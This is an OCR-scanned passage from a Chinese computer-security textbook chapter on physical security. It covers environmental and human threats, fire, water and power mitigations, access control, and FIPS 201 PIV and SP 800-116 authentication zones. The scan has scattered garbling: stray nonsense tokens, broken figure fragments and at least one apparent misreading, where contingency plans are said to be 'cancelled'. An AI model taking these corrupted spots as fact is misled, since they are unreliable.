电磁 干扰 ，” 沿 着 电源 线 产生 的 噪声 不 过 是 电磁 干扰 (ElectroMagnetic Interference, EMI) 
源 中 的 一 种 。 马 达 、 风 扇 、 大 型 设备 甚至 是 其 他 的 计算 机 都 能 产生 电子 噪声 ， 它 可 以 使 你 正在 
使 用 的 计算 机 出 现 断 断 续 续 的 问题 。 这 种 噪声 能 够 在 电线 附近 的 空间 中 传送 。 

另 一 种 EMI 源 ， 来 自 附近 的 广播 电台 和 微波 天 线 的 高 强度 发 射 信号 。 即 使 是 低 强度 设备 ， 
比如 说 蜂窝 电话 ， 也 能 干扰 到 敏感 的 电子 设备 。 


16.24 人 为 的 物理 威胁 


人 为 的 物理 威胁 比 前 面 提 到 的 环境 和 技术 威胁 更 加 难以 处 理 。 人 为 威胁 比 其 他 种 类 的 物理 
威胁 更 加 难以 预知 。 更 糟糕 的 情况 是 ， 人 为 威胁 被 特别 设计 来 攻破 预防 措施 ， 并 且 是 寻找 最 脆 
弱 的 点 来 攻击 。 我 们 可 以 把 这 些 威胁 分 成 以 下 几 类 : 

。 非 授权 的 物理 访问 : 那些 不 是 雇员 的 人 根本 不 应 该 出 现在 这 个 建筑 或 综合 建筑 群 里 ， [543] 
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除非 是 在 有 授权 的 人 的 陪同 下 进入 。 信 息 系 统 资产 ， 例 如 服务 器 、 主 计算 机 、 网 络 设 
备 和 存储 网 络 ， 不 包括 计算 机 和 工作 站 ， 一 般 都 是 放置 在 一 个 受 限 制 的 区 域内 。 有 权 
进入 这 里 的 人 通常 也 都 仅 限 于 一 定数 量 的 工作 人 员 。 非 授权 的 物理 访问 可 能 导致 其 他 
ABU, HOMES). 、 故 意 破 坏 或 者 误 用 。 

e AG: 这 种 威胁 包括 对 设备 的 盗窃 和 对 数据 通过 拷贝 进行 的 盗窃 。 偷 听 和 搭 线 窃 听 也 
属于 这 种 类 型 。 盗 窃 可 能 发 生 在 那些 非法 访问 的 外 部 人 员 或 者 内 部 人 员 的 身上 。 

e 故意 破坏 : 这 种 威胁 包括 对 设备 和 数据 的 毁坏 。 

。 误 用 : 这 种 威胁 包括 授权 用 户 对 资源 的 不 适当 的 使 用 ， 同 样 也 包括 那些 未 授权 的 人 对 
资源 的 使 用 。 


16.3 ”物理 安全 的 防御 和 减缓 措施 


这 一 节 ， 我 们 着 重 讨 论 一 系列 防御 物理 攻击 的 技术 ， 或 者 在 某 些 情 况 下 ， 只 是 阻止 物理 攻 
击 的 技术 。 首 先 分 析 应 对 环境 和 技术 威胁 的 技术 ， 然 后 再 讨论 怎样 预防 人 为 威胁 。 

一 种 通常 的 防范 措施 是 使 用 云 计算 技术 。 从 物理 安全 的 角度 看 ， 云 计算 有 一 个 明显 的 优 
势 ， 即 减少 了 信息 系统 资产 本 地 化 的 需求 ， 使 得 重大 的 数据 资产 不 受 本 地 物理 威胁 的 影响 。 具 
体内 容 请 参见 第 5 章 关于 云 计算 安全 的 讨论 。 


16.3.1 环境 威胁 


我 们 讨论 这 些 威胁 的 顺序 与 16.2 节 相 同 。 

不 合适 的 温度 和 湿度 ”处 理 这 个 问题 主要 还 是 依靠 环境 控制 设备 ， 这 些 设备 要 有 合适 的 功 
能 和 适合 的 传感器 来 对 超出 阐 值 的 事件 进行 报警 。 除 此 以 外 ， 首 先是 保证 电力 供应 ， 后 面 将 对 
此 进行 讨论 。 

AA ”火灾 处 理 包括 预警 、 防 御 措 施 和 灾情 减轻 ， 这 是 一 个 组 合 策略 。[MART73] 提供 
了 以 下 必要 的 措施 : 

1. 选择 发 生 灾害 可 能 性 最 小 的 地 点 。 一 个 受到 良好 保护 的 计算 机 房 或 者 IS 设施 中 几乎 很 
少 发 生火 灾 。IS 设施 应 该 选择 建 在 火 、 水 、 烟 等 灾害 发 生 概率 最 小 的 地 方 附近 。 与 其 他 活动 隔 
离 的 墙 至 少 应 该 有 一 小 时 的 防火 等 级 。 

2. 空 调 管道 和 其 他 管道 要 设计 为 不 能 传播 火灾 。 目 前 已 有 针对 这 些 设计 的 标准 原则 和 
说 明 。 

3. 设备 摆 放 的 位 置 使 损害 最 小 化 。 

4. 良好 的 内 务 处 理 。 档 案 和 可 燃 性 物质 不 允许 存放 在 IS 区 域 中 。IS 设备 的 整洁 安装 也 是 
非常 重要 的 。 

5. 准备 的 手动 灭火 器 必须 是 可 用 的 ， 有 清晰 标识 ， 并 定期 进行 测试 。 

6. 安装 自动 灭火 器 。 自 动 灭火 器 的 安装 必须 保证 不 会 对 设备 造成 损坏 ， 不 会 对 人 员 造 成 
危险 。 

7. 火警 探测 器 。 在 IS 房间 的 探测 器 必须 有 声音 报警 并 同时 有 外 部 控制 ， 这 样 在 启动 自动 
灭火 器 之 前 有 一 个 延 时 以 便 人 工 进 行 干预 。 

8. 配备 电源 开关 。 这 个 开关 必须 标识 清晰 并 且 不 能 被 阻塞 。 所 有 的 人 员 都 必须 熟悉 电源 关 
闭 过 程 。 

9. 张贴 应 急 处 理 程序 。 

10. 人 员 安全 。 在 设计 建筑 物 的 布局 和 应 急 处 理 程序 时 必须 考虑 到 人 员 的 安全 。 

11. 重要 的 档案 必须 保存 在 耐火 的 柜子 或 者 保险 库房 中 。 i 
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12. 用 来 进行 文件 重 构 的 记录 必须 异地 存储 。 

13. 所 有 的 最 新 程序 副本 必须 异地 存储 。 

14. 在 其 他 地 方 使 用 计算 机 设备 的 应 急 计划 应 该 被 取消 。 

15. 保险 公司 或 者 当地 消防 部 门 应 该 检查 这 些 设施 。 

为 了 解决 烟 产生 的 威胁 , .管理 人 员 应 该 在 每 一 个 存放 计算 机 设备 的 屋子 里 ， 在 活动 地 板 的 
下 面 和 悬 吊 顶棚 的 上 面 安装 烟 探测 器 。 在 计算 机 房 内 应 该 禁止 吸烟 。 

对 于 野火 ， 有 效 的 应 对 措施 是 有 限 的。 防火 建筑 技术 造价 高 昂 并 且 也 很 难 证 明 是 有 效 的 。 

水 的 损害 ”对 于 水 产生 的 威胁 进行 防御 和 减少 损失 的 措施 必须 围绕 以 下 几 种 威胁 进行 。 对 
于 管道 泄漏 ， 重 新 铺设 具有 潜在 威胁 的 管道 ， 很 难 证 明 是 有 效 的 。 根 据 供水 管道 的 布局 知识 ， 
合理 地 布置 设备 是 一 个 聪明 的 解决 方案 。 所 有 阀门 的 位 置 应 该 是 清晰 可 见 的 ， 或 者 至 少 是 清楚 
地 在 文档 中 标识 的 。 负 责 人 必须 知道 在 发 生 突 发 事故 时 的 应 急 处 理 程序 。 

为 了 处 理 水 管 泄漏 和 其 他 形式 的 水 灾 ， 传 感 器 是 很 重要 的 。 水 传感器 应 该 被 放置 在 计算 机 
房 的 地 板 上 ， 以 及 活动 地 板 下 面 ， 并 且 在 发 生 水 泄漏 的 时 候 能 够 自动 关闭 电源 。 

其 他 环境 威胁 ”为 了 应 对 化 学 、 生 物 和 辐射 威胁 ， 可 使 用 特定 的 技术 方法 ， 包 括 基础 设施 
设计 、 传 感 器 的 设计 和 安装 、 灾 情 缓解 程序 、 人 员 训 练 ， 等 等 。 这 些 领 域 的 标准 和 技术 也 一 直 
在 发 展 。 

对 于 灰尘 的 危害 ， 显 而 易 见 的 防御 方法 就 是 限制 灰尘 的 进入 ， 方 法 包括 防 尘 装置 的 正常 使 
用 和 维护 ， 以 及 对 IS 房间 的 定期 维护 。 

对 于 生物 侵扰 ， 定 期 控制 害虫 是 必需 的 ， 这 首先 要 从 维持 一 个 干净 整洁 的 环境 开始 。 


16.3.2 ”技术 威胁 


为 了 处 理 电力 中 断 问题 ， 应 该 为 每 一 个 重要 的 设备 配备 一 个 不 间断 电源 ( UPS)。UPS 是 
一 个 备用 电池 单元 ， 它 能 为 处 理 器 、 监 控 器 和 其 他 的 设备 提供 一 段 时 间 的 电力 。UPS 还 具有 浪 
涌 保 护 器 、 电 源 噪声 过 滤器 和 在 电池 电力 低 的 时 候 自动 关闭 设备 等 功能 。 

对 于 更 长 时 间 的 断 电 和 电压 过 低 的 情况 ， 关 键 的 设备 应 该 被 连接 到 应 急电 源 上 ， 比 如 一 台 
发 电机 。 为 提供 可 靠 服务 ， 管 理 人 员 要 解决 一 系列 问题 ， 其 中 包括 产品 选择 、 发 电机 安装 、 人 
员 培 训 、 测 试 和 维护 计划 等 。 

为 了 处 理 电 磁 干 扰 ， 可 以 组 合 使 用 过 滤 和 屏蔽 装置 。 详 细 的 技术 处 理 细 节 要 取决 于 基础 设 
施 设计 、 预 期 的 电磁 干扰 源 和 干扰 的 特性 。 


16.3.3 ”人 为 的 物理 威胁 


对 于 人 为 的 物理 威胁 ， 一 般 解决 方法 就 是 物理 访问 控制 。 基 于 文献 [MICH06b]， 我 们 推荐 
一 些 限制 对 设备 访问 的 方法 ， 这 些 方 法 可 以 组 合 使 用 。 

1. 可 以 通过 限制 访问 存放 资源 的 建筑 物 的 方式 来 限制 对 资源 的 物理 接触 。 这 个 方法 能 拒绝 
外 部 人 员 的 访问 ,但 是 不 能 解决 那些 没有 授权 的 内 部 人 员 或 员工 访问 的 问题 。 

2. 通过 把 资源 锁 在 一 个 柜子 、 保 险 柜 或 者 房间 里 来 限制 与 资源 的 物理 接触 。 

3. 一 个 机 器 可 以 被 访问 ,但 是 它 被 安全 地 连接 到 (可 能 是 永久 地 挫 在 ) 一 个 难以 移动 的 物 
体 上 。 这 样 做 可 以 防止 盗窃 ， 但 是 不 能 阻止 故意 破坏 、 非 授权 的 访问 或 者 误 用 。 

4. 使 用 一 个 安全 的 设备 控制 电源 开关 。 

5. 在 可 移动 的 资源 上 装备 一 个 追踪 设备 ， 这 样 一 个 自动 感应 门 就 可 以 给 安全 人 员 发 警报 ， 
或 者 触发 一 个 自动 门 来 阻止 这 个 设备 被 移动 到 安全 区 域 以 外 。 

6. 便携 设备 要 配备 一 个 追踪 设备 ， 那 么 就 可 以 随时 确定 它 的 当前 位 置 。 
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上 述 的 前 两 个 方法 是 隔离 设备 的 。 能 够 用 来 进行 隔离 访问 控制 的 技术 ， 还 包括 使 用 人 员 巡 


[6545] 逻 或 者 看 守 、 用 栅栏 对 区 域 进行 隔离 、 在 栅栏 〈 门 ) 上 设置 入 口 点 、 对 每 个 人 口 点 上 锁 和 录像 。 


物理 访问 控制 不 仅 能 解决 计算 机 和 其 他 IS 设备 的 问题 ， 也 可 以 解决 系统 连接 线 的 位 置 、 
电力 服务 、 高 压 交流 输电 (HVAC) 设备 和 分 布 式 系统 、 电 话 和 通信 线路 、 备 份 介质 和 文档 问题 。 

物理 访问 控制 除了 设置 物理 和 程序 上 的 障碍 外 ， 有 效 的 物理 访问 控制 体系 还 必须 包括 各 种 
传感器 和 警报 器 ， 这 些 传感器 和 警报 器 能 够 探测 到 入 侵 者 、 非 授权 的 访问 以 及 设备 的 搬 动 。 一 
般 来 说 ， 监 视 系 统 也 是 建筑 安全 整体 中 的 一 部 分 ， 并 且 专 门 用 于 IS 区 域 的 监视 系统 也 得 到 了 
生产 许可 。 这 些 系 统 应 该 提供 实时 的 远程 监控 和 记录 。 


16.4 ”物理 安全 破坏 的 恢复 


物理 安全 受到 破坏 以 后 ， 最 基本 的 恢复 方法 就 是 使 用 元 余 (redundancy). RE REAR 
任何 保密 性 的 问题 ， 比 如 说 对 数据 和 文档 的 偷窃 ， 但 是 它 的 确 能 恢复 丢失 的 数据 。 在 理想 情况 
下 ， 系 统 中 所 有 的 重要 数据 在 站 点 外 都 是 可 访问 的 ， 并 且 要 在 权衡 成 本 / 收益 的 基础 上 对 其 进 
行 近乎 实时 的 更 新 。 在 宽带 连接 广泛 使 用 的 今天 ， 在 专用 网 络 或 者 Internet 上 成 批 的 加 密 备份 
就 是 一 种 佐证 ， 这 些 备份 能 够 在 管理 者 认为 适合 的 任何 时 候 完 成 数据 的 恢复 。 在 极端 情况 下 ， 
能 在 网 站 以 外 建立 一 个 热 站 (hot site)， 它 时 刻 准 备 着 马上 接管 该 网 站 的 运行 ， 并 可 近乎 实时 地 
获取 该 网 站 的 运行 数据 拷贝 。 

恢复 物理 损坏 的 设备 或 者 网 站 取决 于 其 被 损坏 的 程度 ， 而 且 更 重要 的 是 剩余 物 的 特性 。 
水 、 烟 、 火 灾 造 成 的 损坏 可 能 留 下 有 害 物 质 ， 在 正常 操作 和 正常 设备 能 够 被 重新 部 署 运行 之 
前 ， 这 些 危 险 品 必须 被 小 心 必 翼 地 从 现场 运 走 。 很 多 情况 下 ， 这 需要 从 外 面 聘请 灾害 恢复 专家 
来 进行 清理 。 


16.5 ”实例 : 某 公 司 的 物理 安全 策略 


为 了 让 读者 能 直观 地 体验 一 个 机 构 是 如 何 处 理 物理 安全 的 ， 我 们 提供 一 个 在 物理 安全 策略 
方面 真实 的 例子 。 这 个 公司 是 一 个 欧盟 ( European Union，EU) 的 工程 顾问 公司 ， 它 为 全 世界 
范围 内 的 基础 设施 建设 提供 规划 、 设 计 和 管理 服务 。 由 于 对 运输 、 水 利 、 海 事 和 投资 感 兴趣 ， 
这 个 公司 在 一 个 有 多 于 70 个 办 事 机构 的 网 络 上 承接 70 多 个 国家 的 业务 委托 。 

在 线 附 录 H.1 是 从 这 个 公司 的 安全 标准 文档 中 摘录 出 来 的 9。 为 了 使 用 方便 ， 我 们 已 经 把 
文档 中 出 现 的 公司 名 字 改 成 “公司 ”。 该 公司 的 物理 安全 策略 很 大 程度 上 依赖 于 ISO17799 ( 信 
息 安全 管理 实施 细则 Code of Practice for Information security Management) 。 


16.6 ”物理 安全 和 逻辑 安全 的 集成 


物理 安全 包含 许多 的 检测 设备 ， 例 如 传感器 和 报警 器 ， 还 有 许多 的 防御 设备 和 措施 ， 例 如 
锁 和 物理 屏障 。 应 当 明确 ， 对 于 自动 化 和 各 种 智能 化 的 电子 设备 的 综合 运用 ， 还 有 许多 可 以 发 
挥 创造 力 的 地 方 。 显 然 ， 如 果 我 们 对 于 所 有 的 警告 器 和 报警 器 都 有 一 个 中 心目 标 ， 并且 对 所 有 
的 自动 访问 控制 机 制 都 有 一 个 中 央 控 制 ， 比 如 说 智能 卡 访问 系统 ， 那 么 物理 安全 就 会 更 加 有 效 。 

考虑 到 效率 和 成 本 这 两 方面 的 关系 ， 大 家 不 仅 增加 了 对 集成 自动 化 的 物理 安全 功能 的 兴 
趣 ， 而 且 更 进一步 地 增加 了 对 集成 自动 化 的 物理 安全 功能 和 逻辑 安全 功能 的 兴趣 。 其 中 最 有 和 希 
望 的 领域 就 是 访问 控制 。 集 成 物理 安全 和 逻辑 安全 控制 方法 的 例子 包括 ; 

o 对 于 物理 和 逻辑 访问 使 用 同一 个 ID 卡 。 这 个 卡 可 以 是 一 个 简单 的 磁卡 或 者 是 一 个 智能 卡 。 


日 ”整个 文档 可 以 在 站 点 http://www.box.com/CompSec3e (ComputerSecurityPolicy.pdf) 上 获得 。 
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e 跨 所 有 的 身份 和 访问 控制 数据 库 ， 单 步 实现 用 户 / 卡 的 注册 和 注销 。 

e 采用 一 个 ID 卡 中 心 管理 系统 代替 多 个 不 同 用 户 目录 和 数据 库 。 

e 将 事件 监控 和 相关 信息 统一 。 

作为 上 述 安全 集成 的 应 用 例子 ， 假 设 一 个 警报 指出 ，Bob 已 经 登录 公司 的 无 线 网 络 (一 个 
由 逻辑 访问 控制 系统 产生 的 事件 )， 但 并 没有 进入 到 建筑 物 中 (一 个 由 物理 访问 控制 系统 产生 
的 事件 )。 综 合 在 一 起 看 ， 这 说 明 有 人 正在 盗 取 Bob 的 无 线 网 络 账户 。 


16.6.1 个 人 身份 验证 


由 于 物理 和 逻辑 访问 控制 的 集成 将 走向 实用 ， 那 么 广大 的 产品 供应 商 就 必须 符合 标准 ， 这 
些 标准 包括 智能 卡 协议 、 身 份 认 证 和 访问 控制 格式 及 协议 、 数 据 库 登入 、 消 息 格 式 等 。 这 方 
面 最 重要 的 工作 就 是 NIST 颁布 了 联邦 政府 职员 和 承包 商 个 人 身份 验证 标准 (Personal Identity 
Verification (PIV) of Federal Employees and Contractors) FIPS201-1，2011 年 出 版 。 这 个 标准 为 
实际 应 用 定义 了 一 个 可 靠 的 官方 范围 的 PIV 系统 ， 例 如 ， 对 联邦 政府 控制 的 设施 和 信息 系统 
的 访问 。 这 个 标准 详细 说 明了 一 个 PIV 系统 ， 在 这 个 系统 中 ， 能 够 建立 普通 的 身份 认证 证 书 
并 在 以 后 用 于 确认 一 个 访问 者 的 身份 。 这 个 标准 也 定义 了 联邦 政府 要 求 的 安全 等 级 ， 该 等 级 按 
照 被 保护 的 设施 和 信息 所 面临 的 威胁 来 进行 划分 。 该 标准 同样 适用 于 私营 部 门 的 承包 商 ， 可 以 
为 任何 组 织 提供 指南 。 

图 16-2 给 出 了 符合 FIPS 201-2 标准 的 兼容 系统 的 主要 组 件 。PIV 的 前 端 定义 用 户 请 求 访 
问 一 个 设施 的 物理 接口 ， 它 可 以 是 对 一 个 被 保护 区 域 的 物理 访问 ， 也 可 以 是 一 个 对 信息 系统 的 
逻辑 访问 。PIV 前 端子 系统 支持 三 因素 认证 ， 使 用 的 因素 数量 取决 于 要 求 的 安全 等 级 。 前 端 使 用 
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的 智能 卡 ， 又 被 称 为 PIV 卡 ， 它 是 一 个 双重 接口 的 接触 式 卡 或 者 非 接 触 式 卡 。 这 种 卡 中 保 
存 了 持 有 者 的 照片 、X.509 认证 证 书 、 密 钥 、 生 物 特 征 数据 ， 以 及 持 卡 者 的 唯一 认证 标识 
(CHUID), 后面 会 给 出 解释 。 某 些 持 卡 者 的 信息 应 该 是 读 保护 的 ， 读 卡 器 要 使 用 个 人 标识 码 
(PIN) 来 进行 读 取 访 问 。 在 目前 的 标准 版 本 中 ， 生 物 特征 识别 器 就 是 指纹 识别 器 。 

该 标准 为 卡 和 存储 在 卡 上 的 编码 数据 的 验证 定义 了 三 个 安全 等 级 ， 它 们 依次 对 持 有 证 书 的 
人 进行 真实 性 验证 。 普 通 安全 级 别 使 用 读 卡 器 和 PIN。 高 级 安全 级 别 增加 了 一 个 指纹 生物 特征 
比 对 ， 即 把 在 卡 发 放 过 程 中 采集 并 编码 在 卡 上 的 指纹 与 在 物理 访问 点 扫描 到 的 指纹 进行 比 对 。 
更 高 安全 级 别 要 求 在 控制 点 要 有 官方 观察 员 全 程 参与 上 面 描 述 的 过 程 。 

PIV 系统 的 另 一 个 主要 组 件 是 PIV 卡 发 放 和 管理 子 系统 。 这 个 子 系统 包括 负责 身份 证 明和 
注册 的 组 件 、 卡 和 密 钥 的 发 放 与 管理 组 件 、 各 种 存储 库 和 服务 组 件 (比如 公 钥 基础 设施 (PKI) 
目录 、 认 证 状态 服务 )。 作 为 认证 基础 体系 的 一 部 分 ， 这些 是 必需 的 。 

PIV 系统 与 一 个 访问 控制 子 系统 交互 ， 而 访问 控制 子 系统 负责 决定 一 个 特定 的 持 卡 者 能 否 
访问 某 个 物理 或 者 逻辑 资源 。FIPS 201-2 对 PIV 系统 和 访问 控制 系统 之 间 交 互 的 数据 格式 和 协 
议 进行 了 标准 化 。 

与 大 多 数 访问 控制 卡 上 的 卡号 /设备 代码 编码 不 同 ， 通 过 使 用 一 个 截止 日 期 (必需 的 
CHUID 数据 字段 ) 和 一 个 可 选择 的 CHUID 数字 签名 ，FIPS 201CHUID 使 认证 达到 了 一 个 新 的 
水 平 。 通 过 检查 数字 签名 来 确保 卡 上 记录 的 CHUD 是 由 一 个 可 信和 方 签 过 名 的 ， 而 且 也 能 够 确 
保 这 个 CHUID 数据 自从 签名 之 后 没有 被 更 改过 。 对 CHUID 截止 日 期 的 检验 能 够 验证 这 个 卡 
是 否 过 期 。 这 与 卡 的 截止 日 期 和 持 卡 者 的 特权 之 间 的 关系 无 关 。 读 取 和 验证 CHUID 只 能 提供 
身份 的 担保 ， 因 为 它 认 证 的 是 卡 的 数据 而 不 是 持 卡 者 。 PIN 和 生物 特征 提供 对 个 人 的 身份 认证 。 

图 16-3 基于 [FORR06] 说 明了 使 用 FIPS 201-2 的 物理 和 逻辑 访问 控制 的 整合 情况 。 系 统 


非 接触 式 智 物理 访问 控制 系统 智能 卡 识别 器 
能 卡 识别 器 (PACS ) 服务 器 N 


y a 


能 卡 和 生物 ”可 选 的 生物 
特征 中 间 件 ”特征 识别 器 


可 选 的 生物 


智能 卡 编程 器 特征 识别 器 


set 
其 他 用 户 目 录 
图 16-3 ”整合 实例 





来 源 : 基于 [FORR06] 
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的 核心 包括 PIV 系统 、 访 问 控制 系统 ， 以 及 对 签名 的 CHUID 进行 证 书 授权 的 系统 。 这 个 图 的 
其 他 部 分 给 出 一 些 使 用 系统 核心 把 物理 和 逻辑 访问 控制 集成 在 一 起 的 例子 。 
如 果 物 理 和 逻辑 访问 控制 的 集成 扩展 已 经 超出 了 统一 标准 的 前 端 ， 而 成 为 一 个 对 系统 多 元 
素 的 集成 ， 那 就 增加 很 多 益处 ， 包 括 以 下 几 点 [FORR06]: 
© 员工 获得 一 个 单一 、 统 一 标准 的 访问 控制 认证 设备 ; 这 就 降低 了 把 令 牌 放 错 的 可 能 性 ， 
减少 了 训练 和 其 他 上 日常 管理 费用 ， 而 且 人 允许 无 颖 访问 (seamless access), 
e 为 员工 ID 管理 设置 一 个 单独 的 逻辑 单元 ， 从 而 减少 了 对 数据 副本 的 操作 ， 并 且 人 允许 对 
所 有 的 企业 资源 进行 即时 和 实时 的 授权 和 撤销 。 
o 审计 和 执法 部 门 有 一 个 对 访问 控制 进行 调查 的 中 心 数 据 库 。 
© 硬件 通用 能 够 减少 很 多 与 厂商 签订 的 购买 和 技术 支持 的 合约 。 
© 基于 认证 的 访问 控制 系统 也 能 平衡 其 他 安全 应 用 的 用 户 ID 证 书 ， 例 如 文档 的 电子 签名 
和 数据 加 密 。 


16.6.2 在 物理 访问 控制 系统 中 使 用 PIV 证 书 


FIPS 201 定义 了 个 人 证 书 的 特性 ， 这 些 特 性 使 得 个 人 证 书 能 够 被 运用 于 政府 级 别 的 交 
互 操 作 中 。 然 而 ， 在 需要 应 用 多 级 别 访问 控制 的 环境 中 ， 上 述 标 准 作 为 物理 访问 控制 系 
统 ( Physical Access Control System, PACS) 的 一 部 分 ， 并 没有 特意 给 出 其 应 用 指导 。 为 了 提 
供 这 样 的 指导 ， 在 2008 年 ， NIST 提出 了 SP 800-116[A Recommendation for the Use of PIV 
Credentials in Physical Access Control Systems(PACS)]。 
SP 800-116 使 用 了 以 下 的 认证 机 制 : 
e 视觉 认证 (VIS): PIV 卡 的 视觉 身份 验证 是 由 门卫 人 工 完成 的 。 门 卫 检 查 PIV 卡 的 真 
fA, 检查 持 卡 人 和 卡 上 的 图 片 是 否 吻 合 ， 检 查 卡 的 失效 日 期 ， 验 证 卡 上 其 他 信息 的 正 
确 性 ， 并 直观 地 验证 卡 上 的 安全 特征 。 

e 持 卡 人 唯一 标识 (CHUID): CHUID 是 PIV 卡 的 数据 对 象 。 进 行 认证 时 ,需要 将 
CHUID 传输 至 PACS。 

e 生物 认证 (BIO): 通过 使 用 从 PIV 卡 发 送 到 PACS 的 指纹 或 虹膜 的 数据 对 象 来 实现 

认证 。 
o 附加 生物 认证 ( BIO-A) : 该 认证 机 制 与 生物 认证 几乎 相同 ， 只 是 在 持 卡 人 使 用 PIV F 
以 及 提交 PIN 码 和 生物 认证 样本 时 ,增设 了 额外 的 监管 。 

e PIV 认证 密 钥 (PKI): 利用 PIV GES, PACS 可 以 被 用 于 实现 基于 公 钥 密码 学 的 认 
证 。 鉴 于 持 卡 人 必须 输入 PIN 码 解锁 PIV 卡 方 可 认证 成 功 ， 使 用 了 PKI 的 认证 机 制 会 
提供 了 双 因 素 认 证 。 

o 卡 认证 密 钥 (CAK): CAK 是 可 以 存在 于 任何 PIV 卡 上 的 可 选 密 钥 。 使 用 CAK 认证 机 制 

是 为 了 验证 PIV 及 其 所 有 者 。 在 诸多 PIV 密 钥 中 ，CAK 具有 以 下 特性 : 挑战 /应 答 协 议 
H, CAK 可 以 被 用 于 非 接触 式 或 接触 式 接口 上 ; 而且 ， 使 用 CAK 时 无 须 输入 PIN 码 。 

FIPS 201 定义 了 以 上 除 CAK 外 的 其 他 认证 机 制 ，SP800-116 定义 了 CAK 这 种 可 选 的 PIV 
机 制 。SP800-116 被 提出 用 于 设置 一 个 环境 ， 在 该 环境 中 ， 一 个 设施 的 不 同 接 人 点 具有 不 完全 
相同 的 安全 需求 。 因 此 PIV 认证 机 制 应 该 被 选择 性 地 使 用 ， 以 符合 不 同 保护 区 的 安全 需求 。 

SP800-116 建议 认证 机 制 应 该 是 基于 保护 区 域 进行 选择 的 ， 而 保护 区 依据 被 保护 的 资产 和 
资源 划 定 的 。 该 文档 采用 了 “ 受 控 、 限 制 、 隔 离 ” 区 域 的 理念 ， 如 [ARMY01] 中 定义 的 和 
K 16-6 中 概括 的 一 样 。 从 流程 上 来 说 ， 从 属 关系 证 明 通常 足以 说 明 获得 了 对 受 控 区 域 的 访问 
A (例如 ， 持 有 机 构 的 证 章 可 以 允许 其 出 和 人 整个 总 部 )。 访 问 限制 区 域 往往 是 基于 功能 性 的 子 组 或 
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个 体 角色 〈 例 如 ， 持 有 部 门 的 证 章 可 以 出 和 部门 所 在 的 建筑 或 建筑 的 某 侧翼 ) 的 。 建 立 组 内 的 个 
别 成 员 身 份 或 角色 特权 需要 通过 持 卡 人 的 身份 认证 。 访 问 隔离 区 域 只 能 通过 个 人 的 授权 来 获得 。 


表 16-6 保护 区 的 安全 与 控制 等 级 (FM3-19.30 ) 


分 级 a OR 
无 限制 级 不 涉及 安全 利益 的 设施 区 域 


这 部 分 受 限 重地 通常 靠近 或 环绕 一 个 限制 或 隔离 区 域 。 仅 限于 有 访问 需求 的 人 员 方 可 进入 受 控 
受 控 级 区 域 。 经 授权 的 人 员 在 该 区 域 活动 时 不 必 受 控制 ， 这 是 因为 仅仅 进入 该 区 域 不 会 触及 安全 利益 。 
受 控 区 域 被 用 于 监管 控制 ， 保 障 安 全 ， 或 作为 进一步 进入 限制 区 和 隔离 区 域 的 缓冲 区 


限制 级 该 受 限 区 域 非常 贴近 安全 利益 区 域 。 不 加 限制 的 活动 可 能 会 发 生 触及 安全 利益 的 行为 。 护 送 或 
其 他 内 部 限制 可 以 阻止 访问 限制 区 域 


隔离 级 该 受 限 重地 包含 安全 利益 。 不 加 限制 的 活动 直接 触及 安全 利益 
图 16-4a 说 明了 SP800-116 定义 的 一 般 模型 。 该 模型 刻画 了 可 用 于 访问 特定 区 域 的 备 选 认 
证 机 制 ， 且 被 设计 为 至 少 满足 一 个 认证 条 件 即 可 进入 受 控 区 域 ， 满 足 两 个 条 件 可 进入 限制 区 
[551] 域 ， 而 满足 三 个 条 件 则 可 进入 隔离 区 域 。 





a 访问 控制 模型 


| 包含 车 干 建筑 物 
且 有 围栏 的 区 域 。 





b) 应 用 举例 
图 16-4 物理 访问 控制 中 认证 机 制 的 使 用 
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图 16-4b 是 SP800-116 原则 应 用 于 商业 、 学 术 或 政府 设施 的 一 个 实例 。 访 客 登 记 区 域 是 对 
所 有 人 开放 的 区 域 。 在 上 述 实例 中 ， 访 问 登 记 区 域 之 外 的 全 部 设施 全 属于 受 控 区 域 ， 只 有 经 授 
权 的 人 员 及 其 拜访 者 方 可 进入 。 受 控 区 域 可 被 视 为 一 个 相对 低 风险 的 区 域 ， 进 入 该 区 域 的 用 户 
的 身份 需要 得 到 某 种 程度 的 信任 。 对 于 其 中 的 部 分 设施 而 言 ， 形 如 CHUID+VIS 和 CAK 的 单 
因素 认证 机 制 是 很 合适 的 安全 策略 。 限 制 区 域 包含 于 受 控 区 域 之 中 ， 仅 限于 特定 群 组 中 的 个 人 
进入 。 它 可 被 认为 是 一 个 风险 适中 的 区 域 ， 且 PACS 可 为 其 中 颇 有 价值 的 资产 提供 额外 的 安全 
性 。 访 问 该 区 域 的 持 卡 人 的 身份 需 高 度 可 信 。 对 于 限制 区 域 而 言 ，BIO-A 和 PKI 认证 机 制 是 
很 合适 的 安全 对 策 。 这 样 ， 结 合 访问 点 A 的 认证 方式 ， 进 入 限制 区 域 需要 双 因 素 认证 。 最 后 ， 
高 风险 的 隔离 区 域 包含 于 限制 区 域 之 中 ， 仅 限于 特定 名 单 中 的 个 人 进入 。 持 卡 人 访问 隔离 区 域 
AY, PACS 应 该 提供 超 高 的 可 信 的 身份 认证 ， 它 可 以 通过 增加 一 个 不 同 于 访问 点 A 和 了 B 的 第 三 
个 认证 因素 来 实现 。 

图 16-4a 描绘 了 这 个 模型 ， 而 图 16-4b 为 应 用 举例 ， 该 实例 描述 了 这 个 受 限 重地 的 藤 套 架 
构 。 该 架构 未 必 适 用 于 所 有 设施 。 在 一 些 设施 中 ， 可 能 需要 直接 从 外 部 访问 限制 区 域 或 隔离 区 
域 。 在 这 种 情况 下 ， 所 有 必要 的 认证 必须 在 访问 点 实行 。 这 样 ， 一 个 直接 访问 隔离 区 域 的 点 应 
该 实行 一 种 组 合 策略 ， 其 结合 了 CHUID+VIS, BIO 或 BIO-A 以 及 PKI 认证 机 制 。 


16.7 ”推荐 读物 


[NIST95]、[SADO03] 和 [SZUB98] 都 含有 关于 物理 安全 方面 的 章节 。[FEMA93] 是 关于 
物理 安全 方面 的 很 好 的 信息 源 。[FEMA97] 是 一 个 涵盖 所 有 自然 灾害 类 型 的 详细 参考 手册 。 
[DOT12] 是 关于 有 害 物质 有 用 的 参考 。[ARMY10] 尽管 有 军事 方向 ， 它 可 对 物理 安全 和 措施 进 
行 有 效 和 彻底 的 检查 。 


ARMY10 Department of the Army. Physical Security. Field Manual FM 3-99.32, 
August 2010. 

DOT12 U.S. Department of Transportation. Emergency Response Guidebook. 
Pipeline and Hazardous Materials Safety Administration, 2012, http://www 
-phmsa.dot.gov 

FEMA93 Federal Emergency Management Administration. Emergency Management 
Guide for Business and Industry. FEMA 141, October 1993. 

